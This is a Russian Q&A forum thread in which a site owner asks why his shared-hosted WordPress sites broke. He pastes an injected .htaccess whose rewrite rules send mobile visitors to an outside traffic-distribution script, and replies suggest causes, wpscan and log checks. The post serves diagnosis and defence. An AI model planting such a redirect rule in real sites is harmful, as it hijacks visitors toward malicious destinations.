@Grizar

Не работают сайты, вирус, взлом, где искать?

Я имею хостинг аккаунт на isp

5f5905b58751c708185193.jpeg
Здесь размещено десяток сайтов ВОРДПРЕСС.
Папку Домена teme.com создавал я, но "клиент" так и не купил его и папка осталась висеть ПУСТАЯ.
Вчера появился у меня .htaccess и все сайты показывают 500 на всех устройствах.
Хостер отвечает, что меня взломали и лечи свои сайты сам. Но файл .htaccess находится ВЫШЕ моих сайтов,
разве возможно через взломанный сайт закинуть .htaccess на уровень выше папки сайта? Или взлом на уровне хоста?
И должен ли в этом месте вообще находится какой либо .htaccess.

Щас вот заметил что такойже .htaccess имеется и во всех этих папках(кроме первой и второй), это так надо ?

5f591c766c571480790851.jpeg

вот .htaccess который появился
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bbd+|meego|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) [NC]
RewriteRule ^$ http://crazytds.club/redirect.php [R,L]
  • Вопрос задан
  • 244 просмотра
Решения вопроса 5
@MrGroovy
.htaccess используется для простой и удобной настройки веб-сервера на котором хранится сайт пользователя. Он будет действовать только на свой каталог и подкаталоги.
"Ваш" файл .htaccess делает следующее:
Перенаправляет пользователя HTTP_USER_AGENT с вашего сайта на PHP скрипт redirect.php сайта crаzytds.club.
По поводу того, взлом это на уровне хоста или WordPress без логов сказать сложно.

... разве возможно через взломанный сайт закинуть .htaccess на уровень выше папки сайта?

Если у вас есть доступ к записи и редактированию файлов в этой папке, то вполне возможно. Судя по всему сайт был взломан с помощью похищения cookie администратора через XSS на WordPress.
Уязвимости в WP бывают двух видов: устаревшая версия самого WP и уязвимости в плагинах и темах. Крайне опасно использовать "бесплатные" темы, в них часто вшивают вредоносный код.
И если ты "вылечишь" сайт, то нет никаких гарантий что этого не повториться вновь.
Попробуй проверить WPscan с такими ключами:
wpscan --url Адрес сайта -e ap,p,vt,u
Или можешь попробовать онлайн сканеры:
- https://metascan.ru
- hackertarget.com/wordpress-security-scan.
Ответ написан
Комментировать
@webdiez
Меня все знают как WebDiez.
Запроси у хостера лог входов в акк.
Ответ написан
Комментировать
shambler81
@shambler81 Куратор тега htaccess
OtshelnikFm
@OtshelnikFm Куратор тега WordPress
Обо мне расскажет yawncato.com
Не храни яйца в одной корзине.
Э - экономия. Вот она и подвела - 10 сайтов на одном аккаунте.

где искать?
- ищи в нуленных темах и плагинах. И больше не воруй. А тех кто ворует - перенеси на отдельный акк. Пусть там живут и не заражают других.
Ответ написан
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы